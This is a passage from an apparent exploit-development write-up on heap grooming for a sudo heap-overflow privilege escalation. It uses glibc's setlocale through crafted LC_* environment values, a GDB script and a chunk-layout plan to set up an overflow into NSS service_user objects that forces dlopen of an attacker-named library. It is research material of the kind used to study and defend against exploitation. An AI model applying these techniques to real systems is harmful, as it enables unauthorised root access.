9. Heap Fengshui

Knowing how NSS objects are allocated at runtime, the next step is to find a function that lets us control heap allocation before get_user_info() — the “first use” of nss_load_library — is called.

From the heap traces and function tree mapping earlier, one helper stands out right at program startup:

fuzz_sudo_1-64

The Linux setlocale call—set program locale.

9.1. Setlocale

This is a classic heap-shaping primitive in Linux exploitation — and, as recently noted in CVE-2025-4802, it has real security implications:

Untrusted LD_LIBRARY_PATH environment variable vulnerability in the GNU C Library version 2.27 to 2.38 allows attacker controlled loading of dynamically shared library in statically compiled setuid binaries that call dlopen (including internal dlopen calls after setlocale or calls to NSS functions such as getaddrinfo).

Despite being well-known in the PWN community, its role as a heap grooming primitive is rarely documented. Here, we explain its relevance to our vulnerable sudo binary.

9.1.1. Overview

setlocale(int, const char*) is the C/POSIX API that sets the process locale (or returns it if name == NULL):

C
#include <locale.h>

char *setlocale(int category, const char *locale);

It's described in IBM docs as:

Sets, changes, or queries locale categories or groups of categories. It does this action according to values of the locale and category arguments.

Key points:

  • At program start, the default locale is "C" (POSIX/ASCII).
  • Calling setlocale(LC_ALL, "") makes glibc consult the environment (LC_ALL, each LC_*, then LANG).
  • This reconfigures global process state:
    • LC_CTYPE → UTF-8/multibyte handling (mbrtowc, isalpha, …)
    • LC_NUMERIC → decimal/grouping rules (affects printf, strtod)
    • LC_TIME, LC_COLLATE, LC_MONETARY, LC_MESSAGES → time formats, collation, currency, gettext messages

In practice, setlocale is almost always called very early in main(), because:

  1. Many libc calls depend on locale (UTF-8, parsing, I/O).
  2. It must run before threads start (locale is global state).
  3. Frameworks like gettext require it to bootstrap message catalogs.
  4. It incurs filesystem lookups and heap allocations, which are cheaper and deterministic when done once up front.

Typical patterns:

C
#include <locale.h>

int main(void) {
    setlocale(LC_ALL, "");          // honor LC_ALL/LC_* / LANG from env
    // If we need dot as decimal regardless of UI locale:
    // setlocale(LC_NUMERIC, "C");
    // … init gettext, libraries, etc.
}

Looking at sudo.c, we confirm the early call in main:

fuzz_sudo_1-65

Here, the call setlocale(LC_ALL, ""):

  • Reads LC_ALL, each LC_* (e.g., LC_CTYPE, LC_MESSAGES), then LANG from the environment.
  • Configures glibc's global process locale (ctype, messages, collation, numeric, time, monetary).
  • Internals we'll hit in glibc: setlocale_nl_find_locale / _nl_load_locale and sometimes newlocale-style builders.
  • Side effects: heap allocations for the active locale object and per-category name buffers, plus filesystem lookups under /usr/lib/locale or /usr/share/locale.

What we care in our exploit is that, calling setlocale("") will result in several mallocs (category names, locale structures) and string processing for each category we set via LC_*. Different env values change the number/size of internal buffers and candidate path lists.

This makes setlocale a perfect heap fengshui gadget for our attack!

9.1.2. Functions

9.1.2.1. setlocale

This means we can steer heap allocation through setlocale by feeding it crafted environment values before the program starts. Its glibc implementation is in locale/setlocale.c:

C
char *
setlocale (int category, const char *locale)
{
  char *locale_path;
  size_t locale_path_len;
  const char *locpath_var;
  char *composite;

  ...

  // Prepare LOCPATH search list (where to look for locale data)
  locpath_var = getenv ("LOCPATH");
  // Build an argz list from LOCPATH and append the default locale path
  ...

  // [*] Two main modes (determined by `category`):
  //     1) LC_ALL: handle all categories at once. Composite parsing happens
  //        only if the second argument `locale` literally contains ';'.
  //        (In sudo: `setlocale(LC_ALL, "")` → not a composite string.)
  //     2) single category: set just that one

  // Mode 1: LC_ALL
  if (category == LC_ALL)
    {
      // We may receive a composite string. 
    	// a) newnames[] will hold per–category locale name strings
    	//    e.g., "[email protected]", "en_US.UTF-8", or the builtin "_nl_C_name"
      const char *newnames[__LC_LAST];
      // b) newdata[] is the per–category loaded locale objects
    	//    returned by `_nl_find_locale` later
      struct __locale_data *newdata[__LC_LAST];
      char *locale_copy = NULL;		// copy to destructively split CAT=VAL;...

      // Initialize: default all per-category names to the raw 'locale' arg
      // (NOT the environment yet. Env is consulted later inside `_nl_find_locale`)
      for (category = 0; category < __LC_LAST; ++category)
          if (category != LC_ALL)
              newnames[category] = (char *) locale;

      // If the string contains ';', treat it as a composite and parse:
      //     "CATEGORY=VALUE;CATEGORY=VALUE;...".
      if (__glibc_unlikely (strchr (locale, ';') != NULL))
          {		
            /* This is a composite name.  Make a copy and split it up.  */
            locale_copy = __strdup (locale);
            ...
            char *np = locale_copy;
            char *cp;
            int cnt;

            // Iterate "CAT=VAL" clauses
            while ((cp = strchr (np, '=')) != NULL)
                {
                    // Match the category name to one of the known LC_* names
                    for (cnt = 0; cnt < __LC_LAST; ++cnt)
                        ...

                    // Store pointer to VALUE; terminate at ';' (if any)
                    newnames[cnt] = ++cp;
                    cp = strchr (cp, ';');
                    ...

      /* Load the new data for each category.  */
      while (category-- > 0)
        if (category != LC_ALL)		// Resolve and load locale data for each category (except LC_ALL)
          {	
            // [!] _nl_find_locale consults env (LC_ALL → LC_<cat> → LANG → "C")
            //	   if `*newnames[category]` points to "" (common in sudo case)
            //     Returns a locale-data object on success, or NULL on failure
            newdata[category] = _nl_find_locale (			
                                  locale_path, 
                                  locale_path_len,
                                  category,
                                  &newnames[category]
            								    );

            if (newdata[category] == NULL)
              {
                ...
                break;	// Any failure aborts the composite setup
              }

            // For those good env values
            // Mark them as undeletable
            if (newdata[category]->usage_count != UNDELETABLE)
                newdata[category]->usage_count = UNDELETABLE;	
    
            // Intern the name string:
            // - If equals current global name, just alias pointer
            // - [!] Else, duplicate (allocates) to store as stable name
            //       -- Controllable allocation: size ≈ strlen(value)+1
            if (newnames[category] != _nl_C_name)
              {
                if (strcmp (newnames[category],
                            _nl_global_locale.__names[category]) == 0)
                    newnames[category] = _nl_global_locale.__names[category];
                else
                  {
                    // [!] Duplicate the category name string
                    // 
                  	//     In this LC_ALL/"" path, `_nl_find_locale()` has just updated
                  	//     newnames[category]. If locale=="" it chose from the environment
                  	//     (LC_ALL → LC_<category> → LANG → "C"), possibly after alias expansion.
                  	//     We now strdup that chosen name to make it stable.
                  	//
                  	//     This strdup's size is controllable via the length of the env value
                    //     (when LC_ALL is unset and we set LC_<category>/LANG). These
                    //     duplicates are the ones freed in the cleanup path on failure.
                    newnames[category] = __strdup (newnames[category]);	
                    if (newnames[category] == NULL)
                      break;
                  }
                }
              }            

      // Build a canonical composite LC_ALL string from the per-category names
      composite = (category >= 0
                      // If any category failed earlier, composite == NULL
                      ? NULL : new_composite_name (LC_ALL, newnames));
      // If composition string was built successfully
      if (composite != NULL)
          {
              // Commit: install new data and names into the global locale
              for (category = 0; category < __LC_LAST; ++category)
                  if (category != LC_ALL)
                      {
                          setdata (category, newdata[category]);	// set __locale_data
                          setname (category, newnames[category]);	// set name string
                      }
              setname (LC_ALL, composite);	// set LC_ALL string
              ...
          }
      // [!] Cleanup path:
      //     If build failed ⟶ free duplicated name strings allocated above!
      else
          // Cleanup: free duplicated names if we failed mid-way
          for (++category; category < __LC_LAST; ++category)
              if (category != LC_ALL && newnames[category] != _nl_C_name
                          && newnames[category] != _nl_global_locale.__names[category])
                free ((char *) newnames[category]);	// [!] Free all data (allocated heap chunks)
  
      ...
      return composite;
  }
  // Mode 2, not our concern
  else
    {
      ...
    }
}
libc_hidden_def (setlocale)
Expand

A summary of what we can leverage from setlocale() for heap fengshui:

  1. setlocale(LC_ALL, "...") handles either a single name or a composite literal ("LC_CTYPE=...;LC_MESSAGES=...;..."). In sudo, it's actually setlocale(LC_ALL, ""), so names come from the environment per category.
  2. For each target category, it calls _nl_find_locale(locale_path, len, category, &newnames[category]):
    • Validates/parses the value and chooses the name string (from LC_ALLLC_<cat>LANG"C"), possibly alias-expanded.
    • Loads and returns a struct __locale_data * for that category.
  3. Independently of the __locale_data, it duplicates the category name string (unless it's the builtin C) via __strdup(newnames[category]).
    1. strdup calls malloc internally—this is the allocation we control.
    2. These are controllable-size allocations: size ≈ strlen(LC_* value) + 1, then rounded by malloc.
    3. The count of such allocations equals the number of categories that succeed up to the failure point (and for which the name isn't the builtin C nor identical to the current global name).
  4. If any category later fails (invalid name/value, allocation failure, etc.), composite == NULL and the function goes down the cleanup path:
    • It frees the already duplicated name strings in a loop: free((char *)newnames[category]);
    • This yields multiple back-to-back frees of attacker-chosen sizes.
  5. If all succeed, those duplicates persist (no frees). For grooming, intentionally induce a failure after staging several categories.

Quick bin mapping (common prefix), with

value = "C.UTF-8@" + N*'A'

request size is then:

strlen(value) + 1 = 9 + N

We will explain the locale composition format later.

We've established an allocation→free primitive via setlocale(LC_ALL, ""):

  • Successful categories strdup(name) → allocations;
  • A later failure triggers cleanup → frees of those chunks.

Next, we dive into _nl_find_locale to learn:

  1. how it chooses the per-category name (size we allocate), and
  2. how to deterministically trigger a failure (when the frees happen).

Understanding these two levers lets us control both allocation sizes and the timing of the cleanup frees for heap fengshui.

9.1.2.2. _nl_find_locale

The internal callee _nl_find_locale function is the translator from env locale strings → loaded locale objects. It matters for heap shaping: where inputs are parsed, where allocations happen, and where it can deliberately return NULL to drive the setlocale() cleanup frees we noted:

C
struct __locale_data *
_nl_find_locale (const char *locale_path, size_t locale_path_len,
                 int category, const char **name)
{
  int mask;
  /* Name of the locale for this category.  */
  const char *cloc_name = *name;
  const char *language;
  const char *modifier;
  const char *territory;
  const char *codeset;
  const char *normalized_codeset;
  struct loaded_l10nfile *locale_file;

  ...

  // 1) [ENV] 
  //    If empty name was passed, consult ENV in precedence order:
  //       LC_ALL → LC_<category> → LANG → "C".
  //    This is the point where our LC_* env actually enters the pipeline    
  if (cloc_name[0] == '\0')
    {
      /* The user decides which locale to use by setting environment variables.  */
      cloc_name = getenv ("LC_ALL");		// Check env `LC_ALL` first
      if (!name_present (cloc_name))
          cloc_name = getenv (_nl_category_names.str
                      + _nl_category_name_idxs[category]);	// Check special env
      if (!name_present (cloc_name))
          cloc_name = getenv ("LANG");	// Check env `LANG`
      if (!name_present (cloc_name))
          cloc_name = _nl_C_name;			  // falls back to "C"
    }


  // 2) [FAST-PATH] 
  //    Builtins "C"/"POSIX": no file I/O, no heap churn here
  if (__builtin_expect (strcmp (cloc_name, _nl_C_name), 1) == 0
        || __builtin_expect (strcmp (cloc_name, _nl_POSIX_name), 1) == 0)
    {
      //  We need not load anything.  The needed data is contained in the library itself
      *name = _nl_C_name;
      return _nl_C[category];
    }

  // 3) Basic sanity on the locale string (blocks traversal, bad chars).
  //    If invalid, hard-fail → returns NULL
  if (!valid_locale_name(cloc_name)) 
    {
      __set_errno(EINVAL);
      return NULL;  // [FAILURE TRIGGER #1] Invalid locale name → immediate NULL
    }

  //  --- From here, we really have to load some data ---
  *name = cloc_name;

  // 4) [PATH] 
  //    Without LOCPATH, fall back to archive → default search path
  if (__glibc_likely (locale_path == NULL))
    {
      ...

      // Nothing in the archive with the given name 
      // Expanding it as an alias and retry
      cloc_name = _nl_expand_alias (*name);
      if (cloc_name != NULL)
	    ...

      // Nothing in the archive.  Set the default path to search below
      locale_path = _nl_default_locale_path;
      locale_path_len = sizeof _nl_default_locale_path;
    }
  else
    // We really have to load some data 
    // First see whether the name is an alias  
    // Note that this makes it impossible to have "C" or "POSIX" as aliases
    cloc_name = _nl_expand_alias (*name);	

  if (cloc_name == NULL)
    /* It is no alias.  */
    cloc_name = *name;

  // 5) [PARSE & CHECK]
  //    Parse XPG syntax: language[_territory[.codeset]][@modifier]
  //    Produces pointers to each part + a mask of which exist
  //    [ALLOCATION] ⟶ stack
    
  // Make a writable copy of the locale name
  char *loc_name = strdupa (cloc_name);		// strdupa() uses stack (via alloca); no heap allocation here
    
  /* LOCALE can consist of up to four recognized parts for the XPG syntax:

  [!]  language[_territory[.codeset]][@modifier]

  Beside the first all of them are allowed to be missing.  If the
  full specified locale is not found, the less specific one are
  looked for.  The various part will be stripped off according to
  the following order:
		(1) codeset
		(2) normalized codeset
		(3) territory
		(4) modifier
   */
    
  mask = _nl_explode_name (loc_name, &language, &modifier, &territory,
			   				&codeset, &normalized_codeset);
  
  // [!] Validation on the provided locale format
  if (mask == -1)
    return NULL;
  // [FAILURE TRIGGER #2] OOM during explode → NULL

  // 6) [LIST]
  //    _nl_make_l10nflist builds a candidate list/graph (heap)
  //    [ALLOCATION] ⟶ heap
    
  /* If exactly this locale was already asked for we have an entry with
     the complete name.  */
  locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],		// Also heap allocaiton inside
                        				    locale_path, locale_path_len, mask,
                        				    language, territory, codeset,
                        				    normalized_codeset, modifier,
                        				    _nl_category_names.str
                        				    + _nl_category_name_idxs[category], 0);

  // “Out of core” fallback: try scanning all dirs; still allocates nodes
  if (locale_file == NULL)
    {
      /* Find status record for addressed locale file.  We have to search
	     through all directories in the locale path.  */
      locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],	// Also heap allocaiton inside
                              					locale_path, locale_path_len, mask,
                              					language, territory, codeset,
                              					normalized_codeset, modifier,
                              					_nl_category_names.str
                              					+ _nl_category_name_idxs[category], 1);
      // If still fail
      if (locale_file == NULL)
	    /* This means we are out of core.  */
	    return NULL;
      // [FAILURE TRIGGER #3] OOM → NULL (rare but valid)
    }

  /* The space for normalized_codeset is dynamically allocated.  Free it.  */
  if (mask & XPG_NORM_CODESET)
    free ((void *) normalized_codeset);		// [FREE] not attacker-controlled size

  if (locale_file->decided == 0)
    _nl_load_locale (locale_file, category);	// [LOAD] Actually load LC_* data 

  // 7) [FALLBACK]
  //    If it didn't load, try successors
  if (locale_file->data == NULL)
    {
      int cnt;
      for (cnt = 0; locale_file->successor[cnt] != NULL; ++cnt)
      	{
      	  if (locale_file->successor[cnt]->decided == 0)
      	    _nl_load_locale (locale_file->successor[cnt], category);
      	  if (locale_file->successor[cnt]->data != NULL)
      	    break;
      	}
      /* Move the entry we found (or NULL) to the first place of
	 successors.  */
      locale_file->successor[0] = locale_file->successor[cnt];
      locale_file = locale_file->successor[cnt];

      // If all fail, return NULL
      if (locale_file == NULL)
        return NULL;	// [FAILURE TRIGGER #4] No loadable data → NULL
    }

  // 8) Optional “codeset sanity” check
  //    If the user specified a .codese
  //    and it doesn't match what the loaded LC_* data declares 
  //    (post-alias, case-folded) ⟶ reject
  if (codeset != NULL)
    {
      /* Get the codeset information from the locale file.  */
      static const int codeset_idx[] =
        {
          [__LC_CTYPE] = _NL_ITEM_INDEX (CODESET),
          [__LC_NUMERIC] = _NL_ITEM_INDEX (_NL_NUMERIC_CODESET),
          [__LC_TIME] = _NL_ITEM_INDEX (_NL_TIME_CODESET),
          [__LC_COLLATE] = _NL_ITEM_INDEX (_NL_COLLATE_CODESET),
          [__LC_MONETARY] = _NL_ITEM_INDEX (_NL_MONETARY_CODESET),
          [__LC_MESSAGES] = _NL_ITEM_INDEX (_NL_MESSAGES_CODESET),
          [__LC_PAPER] = _NL_ITEM_INDEX (_NL_PAPER_CODESET),
          [__LC_NAME] = _NL_ITEM_INDEX (_NL_NAME_CODESET),
          [__LC_ADDRESS] = _NL_ITEM_INDEX (_NL_ADDRESS_CODESET),
          [__LC_TELEPHONE] = _NL_ITEM_INDEX (_NL_TELEPHONE_CODESET),
          [__LC_MEASUREMENT] = _NL_ITEM_INDEX (_NL_MEASUREMENT_CODESET),
          [__LC_IDENTIFICATION] = _NL_ITEM_INDEX (_NL_IDENTIFICATION_CODESET)
        };
      const struct __locale_data *data;
      const char *locale_codeset;
      char *clocale_codeset;
      char *ccodeset;

      data = (const struct __locale_data *) locale_file->data;
      locale_codeset = (const char *) data->values[codeset_idx[category]].string;
      assert (locale_codeset != NULL);
      /* Note the length of the allocated memory: +3 for up to two slashes
	     and the NUL byte.  */
      clocale_codeset = (char *) alloca (strlen (locale_codeset) + 3);
      strip (clocale_codeset, locale_codeset);

      ccodeset = (char *) alloca (strlen (codeset) + 3);
      strip (ccodeset, codeset);

      if (__gconv_compare_alias (upstr (ccodeset, ccodeset),
                                upstr (clocale_codeset,
								 	                    clocale_codeset)) != 0)
	    /* The codesets are not identical, don't use the locale.  */
	    return NULL;	// [FAILURE TRIGGER #5] User-specified .codeset mismatch → NULL.
      // This is a reliable knob to force failure after earlier successes
    }

  // 9) Persist the resolved actual locale name into the data object.
  //    This __strndup() is a real heap allocation (size ~ len("<locale>"))
  //    The format is <path>/<locale>/LC_foo
  //    We must extract the <locale> part
  if (((const struct __locale_data *) locale_file->data)->name == NULL)
    {
      char *cp, *endp;

      endp = strrchr (locale_file->filename, '/');
      cp = endp - 1;
      while (cp[-1] != '/')
	    --cp;
      ((struct __locale_data *) locale_file->data)->name
	              = __strndup (cp, endp - cp);
      // [ALLOCATION] __strndup stores canonical locale name in data->name (heap)
    }

  // 10) Optional flag from @modifier
  if (modifier != NULL
      		&& __strcasecmp_l (modifier, "TRANSLIT", _nl_C_locobj_ptr) == 0)
    ((struct __locale_data *) locale_file->data)->use_translit = 1;

  // 11) Bump usage count; caller may later mark UNDELETABLE
  if (((const struct __locale_data *) locale_file->data)->usage_count
    	< MAX_USAGE_COUNT)
    ++((struct __locale_data *) locale_file->data)->usage_count;

  return (struct __locale_data *) locale_file->data;
}
Expand

Its Role is simple:

Translates env-provided locale names into a loaded __locale_data* for a given category. If anything looks wrong or cannot be loaded, it returns NULL.

In conclusion, the function:

  • Reads locale from env with precedence LC_ALLLC_<category>LANG"C".
  • Fast-path for "C"/"POSIX": returns builtin data, no heap work.
  • valid_locale_name check: reject bad names early → NULL.
  • If no LOCPATH, try archive; otherwise handle alias then fall back to default search path.
  • Copy name to stack via strdupa, then parse XPG syntax language[_territory[.codeset]][@modifier] with _nl_explode_name; If parsing fails, OOM here → NULL.
  • Build/lookup candidate list via _nl_make_l10nflist (heap allocations). If failure, OOM → NULL.
  • Load the chosen candidate via _nl_load_locale; if it fails, try successors. If all fail → NULL.
  • Optional codeset sanity: if user specified .codeset and it doesn't match the loaded data after alias/uppercasing, reject → NULL.
  • Store canonical locale name via __strndup into data->name (heap), set use_translit if @translit, bump usage_count, and return the data; on failure, returns NULL.

It sets the exact name string that setlocale will strdup (size we control) and gives us clean NULL return points (e.g., codeset mismatch) to trigger the bulk frees for heap grooming.

  • It chooses/aliases the name string that setlocale later __strdups → this is our size knob (via LC_<category> lengths, with LC_ALL unset).
  • It provides deterministic NULL exits to trigger setlocale's cleanup frees after some categories have already allocated:
    • invalid name (valid_locale_name),
    • no loadable candidate (after successors),
    • codeset mismatch.

Before we start tuning per-category locale strings, we need one last detail from _nl_find_locale: how the numeric category value maps to the concrete LC_* name?

9.1.3. Category IDs

To craft heap allocations deterministically, we need to know which LC_* env vars glibc actually looks at. Internally, glibc assigns each category a numeric ID (used as an index into lookup tables).

From locale/bits/locale.h:

C
#if !defined _LOCALE_H && !defined _LANGINFO_H
# error "Never use <bits/locale.h> directly; include <locale.h> instead."
#endif

#ifndef _BITS_LOCALE_H
#define _BITS_LOCALE_H		 

#define __LC_CTYPE		 	    0
#define __LC_NUMERIC		    1
#define __LC_TIME		 	      2
#define __LC_COLLATE		    3
#define __LC_MONETARY		    4
#define __LC_MESSAGES		    5
#define __LC_ALL			      6
#define __LC_PAPER		 	    7
#define __LC_NAME		 	      8
#define __LC_ADDRESS		    9
#define __LC_TELEPHONE		  10
#define __LC_MEASUREMENT	  11
#define __LC_IDENTIFICATION	12

#endif	/* bits/locale.h */

The public macros LC_CTYPE, LC_TIME, etc. are just wrappers around these.

Inside glibc, functions like _nl_find_locale(category, …) use the numeric ID to fetch the right env variable name via a table:

C
const char *catname =
    _nl_category_names.str + _nl_category_name_idxs[category];  // e.g. "LC_TIME"
const char *val = getenv(catname);  // fetches LC_TIME, LC_MONETARY, etc.

That's why we see:

cloc_name = getenv(_nl_category_names.str + _nl_category_name_idxs[category]);

Precedence logic:

  1. LC_ALL (string literal)
  2. LC_<category> (derived via the index above)
  3. LANG
  4. fallback to "C"

Concrete example workflow:

C
setlocale(LC_TIME, "");       // LC_TIME == __LC_TIME == 2
// Inside _nl_find_locale(category=2):
// 1) cloc_name = getenv("LC_ALL");
// 2) if empty, cloc_name = getenv("LC_TIME");   // name derived from category id 2
// 3) else getenv("LANG"); else "C"
// Then resolve/load data for the TIME category and return it.

This means when sudo.c:main calls:

C
setlocale(LC_ALL, "");

Glibc walks categories 0–12, and for each:

LC_ALL → LC_<category> → LANG → "C"

→ The env values chosen here drive the strdup() allocations we can shape.

Thus, by prepping environment vars (LC_TIME, LC_MESSAGES, etc.) with strings of chosen length, we decide both how many allocations occur and their exact sizes. If we later trigger a failure path, glibc frees them all in order — giving us a very deterministic alloc→free primitive for heap fengshui.

9.2. The Primitives

Now we understand how to twist setlocale into a heap-fengshui lever:

  • Goal: perform a series of predictable allocations followed by predictable frees right after process startup to seed tcache/fastbin with chunks of sizes we control.
  • Primitive: supply LC_* values (or a composite LC_ALL string) such that:
    1. several categories succeed → each success calls __strdup, allocating a chunk of strlen(value)+1.
    2. one later category fails → the cleanup path frees all previously duplicated chunks back-to-back.
  • Effect: we deterministically enqueue N chunks of chosen sizes into the free lists, ready to be re-used by NSS allocations (service_user, service_library, etc.) later.

Since sudo calls setlocale(LC_ALL, ""), glibc pulls locale names per category directly from the environment. This gives us granular control.

9.2.1. Allocation Primitive

To guarantee allocation, we must pass a valid locale string that won't collapse to a shorter alias. The trick: abuse the modifier field (@...) of locale names. Glibc preserves everything after @.

Safe pattern:

C.UTF-8@<padding>

With this, the malloc request size is:

request = strlen(value) + 1 = 9 + N

Mapping to glibc bins (including the 0x10 header):

Target bin (header)request rangechoose N (since request = 9+N)
0x20 (0x21 shown)1..240..15
0x30 (0x31)25..4016..31
0x40 (0x41)41..5632..47
0x50 (0x51)57..7248..63
0x60 (0x61)73..8864..79
0x70 (0x71)89..10480..95
0x80 (0x81)105..12096..111
0x90 (0x91)121..136112..127
0xA0 (0xA1)137..152128..143

So:

  • unset LC_ALL (optional, it's unset by default),
  • set per-category env vars (LC_CTYPE, LC_TIME, LC_MESSAGES, …) to "C.UTF-8@" + "A"*N.

Each category gives us one allocation of size tuned by N.

Avoid forms like .utf8 that might alias to .UTF-8 and change length.

9.2.2. Free Primitive

Once we have a few categories staged with allocations, we need to trigger the cleanup path to free them all.

Simplest move: make a later category fail resolution. Example:

export LC_TELEPHONE="bad/locale"

When _nl_find_locale can't resolve it, setlocale aborts composite setup and frees all previously strdup'd names.

9.3. Dynamic Debugging

To actually see the primitive in motion, we'll set up a minimal playground and watch glibc allocate and (sometimes) free the chunks for us.

Our plan:

  1. Call setlocale(LC_ALL, "") at startup.
  2. Feed specific per-category LC_* env values whose lengths map to chosen bins.
  3. Force a later category to fail, so setlocale takes the cleanup path and frees the earlier chunks back into tcache.

Tiny target program:

C
// build: gcc -O0 -g loc.c -o loc
#define _GNU_SOURCE
#include <stdio.h>
#include <locale.h>

int main(void) {
    setlocale(LC_ALL, "");  // pulls per-category from env
    puts("done");
    return 0;
}

9.3.1. Seclocale Workflow

Let's first run it with no crafted env vars, and trace how _nl_find_locale behaves when setlocale(LC_ALL, "") is called:

fuzz_sudo_1-66

Because no LC_ALL or LC_* is set, it falls back to LANG. On our system, LANG=en_US.UTF-8, so that becomes the candidate locale string.

Then _nl_find_locale parses/validates it and returns a pointer to a freshly loaded struct __locale_data object for "en_US.UTF-8":

fuzz_sudo_1-67

At this point, the newnames[category] array is populated:

fuzz_sudo_1-68

Each index corresponds directly to a locale category ID:

C
// newnames[] is indexed DIRECTLY by the locale category ID.
// The array is NOT reversed. What's reversed is the processing order
// when setlocale(LC_ALL, ...) iterates categories from high→low because of `while category--`.

#define __LC_CTYPE           0   // newnames[0]
#define __LC_NUMERIC         1   // newnames[1]
#define __LC_TIME            2   // newnames[2]
#define __LC_COLLATE         3   // newnames[3]
#define __LC_MONETARY        4   // newnames[4]
#define __LC_MESSAGES        5   // newnames[5]
#define __LC_ALL             6   // (not a real per-category slot; skipped)
#define __LC_PAPER           7   // newnames[7]
#define __LC_NAME            8   // newnames[8]
#define __LC_ADDRESS         9   // newnames[9]
#define __LC_TELEPHONE      10   // newnames[10]
#define __LC_MEASUREMENT    11   // newnames[11]
#define __LC_IDENTIFICATION 12   // newnames[12]

One subtlety: the processing loop in setlocale(LC_ALL, …) iterates categories backwards (while category--), so allocations happen from high→low even though the table is indexed low→high.

Then comes the ownership flip:

C
newnames[category] = __strdup(newnames[category]);

Here, __strdup (glibc's internal strdup) mallocs a fresh buffer, copies the locale string (NUL-terminated), and returns the heap pointer:

fuzz_sudo_1-69

The loop repeats until all 13 categories are processed, from higher index to lower:

fuzz_sudo_1-70

Until we have 13 chunks, the first one at the very top of the heap (there was a 0x20 tcache-bin chunk so it was reused) and 12 new allocations from the top chunk:

In our trace, that produced one reused 0x20 chunk (from tcache, grabbed by the first category), plus 12 fresh allocations pulled from the top chunk:

fuzz_sudo_1-71

Since composite is successfully built, the cleanup path isn't triggered. All the duplicated locale name chunks remain live, anchored by newnames[]:

fuzz_sudo_1-72

So far: we've confirmed that each category leads to a controlled malloc, and that freeing only happens if we deliberately induce a failure. Next up, we'll rig the env vars so the cleanup path kicks in and dumps those allocations back into tcache — exactly the primitive we want.

9.3.2. ENV Manipulation

With the groundwork in place, we can now feed setlocale() tailored LC_* values to force allocations of chosen sizes, then deliberately trip a failure to dump them all back into tcache.

A minimal GDB script lets us automate this:

set pagination off
set confirm off

python
import gdb
def mk(n): return 'C.UTF-8@' + ('A'*int(n))

envs = [
    ('LC_IDENTIFICATION',15), # 0x20 chunk, pop first
    ('LC_MEASUREMENT',   31),	# 0x30 chunk
    ('LC_TELEPHONE',     47),	# 0x40 chunk
    ('LC_ADDRESS',       63),	# 0x50 chunk
    ('LC_NAME',          79),	# 0x60 chunk
    ('LC_PAPER',         95),	# 0x70 chunk
    ('LC_MESSAGES',     111),	# 0x80 chunk
    ('LC_MONETARY',     127),	# 0x90 chunk
    ('LC_COLLATE',      143),	# 0xa0 chunk, ↲ same bin list
    ('LC_TIME',         143),	# 0xa0 chunk
    ('LC_NUMERIC',      143),	# 0xa0 chunk
]

# Success allocations
for env,n in envs:
    gdb.execute(f"set environment {env}={mk(n)}", to_string=True)

# Failure trigger cleanup frees
gdb.execute("set environment LC_CTYPE=bad/locale", to_string=True)	# pop at the end
end

The n values are chosen from the earlier bin-size table, ensuring each category's duplicated locale name lands in a predictable heap bin.

Run with:

gdb -q -x loc_env.gdb --args ./loc

Once execution reaches the __strdup calls, the heap layout aligns exactly with our crafted env strings:

fuzz_sudo_1-74

And when the invalid LC_CTYPE=bad/locale is processed last, _nl_find_locale fails, pushing setlocale down the cleanup path — every previously allocated chunk is freed back-to-back into tcache:

fuzz_sudo_1-75

Notice in the dump:

  • Three 0xa0-sized chunks now sit in the bin list because we seeded three categories with identical size values.
  • Earlier frees (e.g., 0x30) also appear in the right bins.

This gives us a predictable allocator/free primitive at process startup. By pre-loading tcache bins with chosen sizes, we can deterministically shape the heap such that our vuln chunk lands immediately above the NSS target chunks.

9.4. Heap Fengshui on Sudo

I initially thought of pushing this into the next chapter since it's part of the exploit proper. But in practice, every heap exploitation chain begins with shaping the arena — so it makes sense to close this chapter by tying our fengshui primitive to the real target.

9.4.1. Target Heap Object

Given #Requirements we collected,

  • #Requirement 1 — lib_handle == NULL on service_library
    • Ensures dlopen path is taken: (*currentp)->lib_handle = NULL;
  • #Requirement 2 — ni->library == NULL on service_user Forces creation/attach of a fresh service_library (#Requirement 1).
  • #Requirement 3 — ni->name hijacked to a nonexistent service
    • Steers lookup to libnss_<name>.so.2 under our control.
  • #Requirement 4 — symbol cache miss (ni->known lacks fct_name)
    • Forces fresh dlsym (e.g., for "getpwuid_r").

The net effect: we just need to smash a service_user chunk. Overwriting its .name and resetting .library to NULL is enough to force glibc into dlopening our library on the next lookup.

So, the victim is one of the initialized service_user objects parsed from /etc/nsswitch.conf.

9.4.2. Target Sizes

Quick recap of object sizes:

ObjectTypical request sizeTypical chunk (mchunk)
name_database0x100x20
name_database_entry0x10 + (db_len+1) → usually 0x200x20
service_library0x180x20
service_user0x30 + (svc_len+1) → usually 0x400x40

So, our fengshui must guarantee that 0x40 tcache bins are primed — because that's what service_user lives in.

9.4.3. Vuln Chunk Size

We need a driver chunk that will later overflow into a victim. Two rules:

  1. It must be easy to mint with our setlocale alloc/free primitive.
  2. It should belong to a rarely used size class, so it survives uncontested until we trigger the vuln.

We can develop a helper GDB script to parse and summarize our allocation traces (heap_trace.log). Example output:

fuzz_sudo_1-76

By analyzing the output, we see that 0xa0 and 0xb0 chunks are barely touched across execution. Both fall neatly into tcache bins (≤0x400), which obey the LIFO rules that can be controlled easily in heap fengshui.

Thus, we select 0xa0 as our vuln chunk size.

9.4.4. Fengshui Design

Heap shaping is where “fengshui” earns its name: the art is in placing the vulnerable driver chunk just above the target NSS chunks, while minimizing collateral corruption.

In §8.3.2, we see the baseline layout (without fengshui):

fengshui_1

Here, most NSS chunks (entries, service_users) are carved from the unsorted bin after parsing /etc/nsswitch.conf, with occasional allocations satisfied from earlier tcache frees.

With our setlocale primitive, we can deterministically reseed the bins:

fengshui_2

Plan:

  1. Cache one 0xa0 and multiple 0x40 tcache bin slots with frees via setlocale.
  2. When __nss_database_lookup builds the service_user chain, those cached chunks are consumed first → placing our target service_user nodes exactly where we want them.
  3. Other structures (0x20-sized) can still flow naturally from top/unsorted bins, so we don't disrupt global root tables.
  4. Later, set_cmnd() allocates the vulnerable command-path chunk (0xa0). Positioned just above the reused 0x40 victim, it overflows downward into the target service_user (e.g., the ones for "group" database).

That's the fengshui.